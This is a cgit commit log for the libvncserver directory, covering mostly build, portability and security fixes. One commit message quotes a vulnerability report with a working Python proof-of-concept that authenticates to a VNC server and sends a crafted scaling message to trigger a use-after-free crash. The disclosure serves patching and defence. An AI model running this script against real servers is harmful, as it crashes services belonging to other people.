summaryrefslogtreecommitdiffstats
path: root/libvncserver
Commit message (Collapse)AuthorAgeFilesLines
* Per libvncserver developer bk138 do not automatically release onHoldr14.0.1Timothy Pearson2015-01-131-1/+0
|
* Add missing files from previous commitTimothy Pearson2015-01-102-0/+61
|
* Port required changes for TDE's krfb server from the old libvnc version ↵Timothy Pearson2015-01-102-37/+162
| | | | embedded with krfb
* Fix building with mingw-w64.Christian Beier2014-12-301-1/+3
|
* Update comments regarding rfbClientConnectionGone().Christian Beier2014-10-211-2/+3
|
* Fix Use-After-Free vulnerability in LibVNCServer wrt scaling.Christian Beier2014-10-211-2/+0
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Reported by Ken Johnson <[email protected]>. The vulnerability would occur in both the rfbPalmVNCSetScaleFactor and rfbSetScale cases in the rfbProcessClientNormalMessage function of rfbserver.c. Sending a valid scaling factor is required (non-zero) if (msg.ssc.scale == 0) { rfbLogPerror("rfbProcessClientNormalMessage: will not accept a scale factor of zero"); rfbCloseClient(cl); return; } rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg); rfbLog("rfbSetScale(%d)\n", msg.ssc.scale); rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale); rfbSendNewScaleSize(cl); << This is the call that can trigger a free. return; at the end, both cases there is a call the rfbSendNewScaleSize function, where if the connection is subsequently disconnected after sending the VNC scaling message can lead to a free occurring. else { rfbResizeFrameBufferMsg rmsg; rmsg.type = rfbResizeFrameBuffer; rmsg.pad1=0; rmsg.framebufferWidth = Swap16IfLE(cl->scaledScreen->width); rmsg.framebufferHeigth = Swap16IfLE(cl->scaledScreen->height); rfbLog("Sending a response to a UltraVNC style frameuffer resize event (%dx%d)\n", cl->scaledScreen->width, cl->scaledScreen->height); if (rfbWriteExact(cl, (char *)&rmsg, sz_rfbResizeFrameBufferMsg) < 0) { rfbLogPerror("rfbNewClient: write"); rfbCloseClient(cl); rfbClientConnectionGone(cl); << Call which may can lead to a free. return FALSE; } } return TRUE; Once this function returns, eventually rfbClientConnectionGone is called again on the return from rfbProcessClientNormalMessage. In KRFB server this leads to an attempt to access client->data. POC script to trigger the vulnerability: ---snip--- import socket,binascii,struct,sys from time import sleep class RFB: INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" AUTH_NO_PASS = "\x01" AUTH_PASS = "\x02" SHARE_DESKTOP = "\x01" def AUTH_PROCESS(self,data,flag): if flag == 0: # Get security types secTypeCount = data[0] secType = {} for i in range(int(len(secTypeCount))): secType[i] = data[1] return secType elif flag == 1: # Get auth result # 0 means auth success # 1 means failure return data[3] def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD): try: from Crypto.Cipher import DES except: print "Error importing crypto. Please fix or do not require authentication" sys.exit(1) if len(PASSWORD) != 8: PASSWORD = PASSWORD.ljust(8, '\0') PASSWORD_SWAP = [self.reverse_bits(ord(PASSWORD[0])),self.reverse_bits(ord(PASSWORD[1])),self.reverse_bits(ord(PASSWORD[2])),self.reverse_bits(ord(PASSWORD[3])),self.reverse_bits(ord(PASSWORD[4])),self.reverse_bits(ord(PASSWORD[5])),self.reverse_bits(ord(PASSWORD[6])),self.reverse_bits(ord(PASSWORD[7]))] PASSWORD = (struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7])) crypto = DES.new(PASSWORD) return crypto.encrypt(data) def reverse_bits(self,x): a=0 for i in range(8): a += ((x>>i)&1)<<(7-i) return a def main(argv): print "Proof of Concept" print "Copyright TELUS Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py <host> <port> [password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x01": # Send accept for None pass remote.send(vnc.AUTH_NO_PASS) else: print 'The server sent us something weird during auth.' sys.exit(1) # Get result data = remote.recv(1024) # Process result result = vnc.AUTH_PROCESS(data,1) if result == "\x01": # Authentication failure. data = remote.recv(1024) print 'Authentication failure. Server Reason: ' + str(data) sys.exit(1) elif result == "\x00": print "Authentication success." else: print 'Some other authentication issue occured.' sys.exit(1) # Send ClientInit remote.send(vnc.SHARE_DESKTOP) # Send malicious message print "Sending malicious data..." remote.send("\x08\x08\x00\x00") remote.close() if __name__ == "__main__": main(sys.argv) ---snap---
* Fix selData.buttonWidth calculationMaks Naumov2014-10-141-1/+1
| | | Operator "+" has a higher priority than "? :"
* Fix stack-based buffer overflowNicolas Ruff2014-10-071-1/+2
| | | | | | | There was a possible buffer overflow in rfbFileTransferOffer message when processing the FileTime. Signed-off-by: Johannes Schindelin <[email protected]>
* Fix multiple stack-based buffer overflows in file transfer featurenewsoft2014-10-061-8/+30
|
* Make sure that no integer overflow could occur during scalingnewsoft2014-10-061-1/+22
|
* Merge pull request #38 from LibVNC/autotools-fix-revisitedChristian Beier2014-10-021-1/+1
|\ | | | | Autotools fix revisited.
| * Rename obsolete INCLUDES to AM_CPPFLAGSBrian Bidulock2014-10-021-1/+1
| |
* | Close unclosed comments ;-)Johannes Schindelin2014-09-301-2/+2
| | | | | | | | Signed-off-by: Johannes Schindelin <[email protected]>
* | A forgotten `#ifdef WIN32` broke UNIX build.Daniel Cohen Gindi2014-09-301-0/+2
| |
* | Signal is a fundamental UNIX function, and must be omitted for any windows ↵Daniel Cohen Gindi2014-09-201-1/+1
| | | | | | | | compilation
* | These are UNIX headers, and are not available on MSVCDaniel Cohen Gindi2014-09-201-0/+5
| |
* | On windows, use the Win32 calls for directory enumerations.Daniel Cohen Gindi2014-09-201-3/+78
| | | | | | | | We also do not need the conversion between UNIX values to Windows values in the RTF_FIND_DATA struct, as we already are on windows.
* | Generally adjusting headers for compiling on windows without the mixing of ↵Daniel Cohen Gindi2014-09-203-1/+15
| | | | | | | | Winsock 1 and 2.
* | Just use a macro to bridge to the Win32 version of `mkdir`Daniel Cohen Gindi2014-09-201-5/+6
| | | | | | | | The additional compat_mkdir function was not necessary at all.
* | Fixed a violation of the C89 standard ("declarations must come before ↵Daniel Cohen Gindi2014-09-203-10/+16
| | | | | | | | instructions")
* | A windows version for directory enumerationsDaniel Cohen Gindi2014-09-201-0/+147
| | | | | | | | Basically taken from https://github.com/danielgindi/FileDir with some adjustments
* | MSVC also has the __FUNCTION__ predefinedDaniel Cohen Gindi2014-09-201-1/+1
| |
* | `CreateDirectory` might clash with the `CreateDirectoryA`/`CreateDirectoryW` ↵Daniel Cohen Gindi2014-09-202-1/+13
| | | | | | | | macros on MSVC
* | Fail when NULL is passed to CreateFileListInfo()Daniel Cohen Gindi2014-09-201-2/+6
| | | | | | | | Passing NULL to sprintf() would most likely crash the program.
* | `strings.h` and `resolv.h` are not available on MSVC, and some POSIX ↵Daniel Cohen Gindi2014-09-204-1/+19
|/ | | | | | functions are renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* Do not accept a scaling factor of zero on PalmVNCSetScaleFactor and SetScale ↵Nicolas Ruff2014-08-181-0/+14
| | | | client->server messages. This would cause a division by zero and crash the server.
* Check malloc() return value on client->server ClientCutText message. Client ↵Nicolas Ruff2014-08-181-0/+5
| | | | can send up to 2**32-1 bytes of text, and such a large allocation is likely to fail in case of high memory pressure. This would in a server crash (write at address 0).
* allow rfbInitSockets with non-ready states.Amandeep Singh2014-08-031-2/+3
| | | | | This allows for reinitializations of e. g. sockets in a SHUTDOWN state. The only state that doesn't make sense to reinitialize are READY states.
* Fix crash in krfbAmandeep Singh2014-08-031-4/+7
| | | | | Krfb crashes on quit, if any client is connected due to a rfbClientConnectionGone call missing
* Fix tyopJohannes Schindelin2014-03-311-1/+1
| | | | Signed-off-by: Johannes Schindelin <[email protected]>
* Set opcode correctly for binary frames.Joel Martin2013-02-271-0/+1
|
* Work around a gcc bug with anonymous structs and unions.Raphael Kubo da Costa2012-09-141-10/+15
| | | | | | | | | | GCC < 4.6 failed to parse the declaration of ws_header_t correctly because it did not accept anonymous structs and unions. [1] Work around the bug by adding names to the unions and structs. Ugly, but works. [1] http://gcc.gnu.org/bugzilla/show_bug.cgi?id=4784
* Include stdio.h for snprintf(3)Raphael Kubo da Costa2012-09-141-0/+2
|
* Add the required headers for read(2)Raphael Kubo da Costa2012-09-141-0/+5
|
* Use htobeNN(3) to convert numbers in websocket.c.Raphael Kubo da Costa2012-09-141-14/+11
| | | | | | | | | byteswap.h exists only on glibc, so building libvncserver with websockets support was not possible in other systems. Replace the inclusion of byteswap.h and the WS_* definitions with calls to htobeNN, which should perform the same conversions, be more portable and avoid the need to check for the platform's endianness.
* Tune the definitions needed when building with -ansi.Raphael Kubo da Costa2012-09-144-2/+12
| | | | | | | | | | | | | The current definitions were mostly useful to glibc and followed its feature_test_macros(3) documentation. However, this means other platforms still had problems when building with strict compilation flags. _BSD_SOURCE, for example, is only recognized by glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the removal of some definitions (such as the outdate _POSIX_SOURCE one). _POSIX_SOURCE also had to be conditionally defined in some places, as what it enables or disables during compilation varies across systems.
* Add some missing feature macro definitions.Raphael Kubo da Costa2012-09-142-0/+10
| | | | | | | Building with -ansi failed due to some code (as well as system headers) using non-C89 features. Fix that by adding the usual _POSIX_SOURCE and _BSD_SOURCE definitions already present in some other files.
* Use C-style comments in rfbconfig.h.cmake and C source code.Raphael Kubo da Costa2012-09-142-5/+5
| | | | | Using C++-style comments when building the code with -ansi does not work, so be more conservative with the comment style.
* Correctly include rfbconfig.h.Raphael Kubo da Costa2012-09-141-1/+1
| | | | | build_dir/rfb is not passed as an include directory automatically to the compiler, so including that file fails.
* Patched sockets.c to allow the use of IPv6 without IPv4.Oliver Loch2012-08-191-1/+6
| | | | As requested only those lines are indented that have been changed.
* Remove autogenerated files from repo.Christian Beier2012-05-312-483/+0
|
* libvncserver/sockets.c: do not segfault when listenSock/listen6Sock == -1Kyle J. McKay2012-05-211-2/+2
|
* LibVNCServer: Prefer GnuTLS over OpenSSL to be in sync with LibVNCClient.Christian Beier2012-04-301-4/+4
|
* Some more libjpeg, libpng and zlib related build fixes.Christian Beier2012-04-301-2/+2
|
* Only try to build TightPNG stuff when libjpeg is available.Christian Beier2012-04-301-16/+10
| | | | | | | TightPNG replaces the ZLIB stuff int Tight encoding with PNG. It still uses JPEG rects as well. Theoretically, we could build TightPNG with only libpng and libjpeg - without zlib - but libpng depends on zlib, so this is kinda moot.
* Properly check return value.Christian Beier2012-04-261-1/+4
| | | | This also fixes a compiler warning.
* Include some more missing files for make dist.Christian Beier2012-04-261-2/+2
|
* Include missing files for make dist.Christian Beier2012-04-251-0/+1
|
* Fix some compiler warnings thrown with newer gcc.Christian Beier2012-04-252-5/+4
|
* Merge branch 'turbovnc'Christian Beier2012-04-253-584/+460
|\ | | | | | | | | Conflicts, resolved manually: AUTHORS
generated by cgit v1.2.1 (git 2.18.0) at 2025-02-10 15:24:11 +0000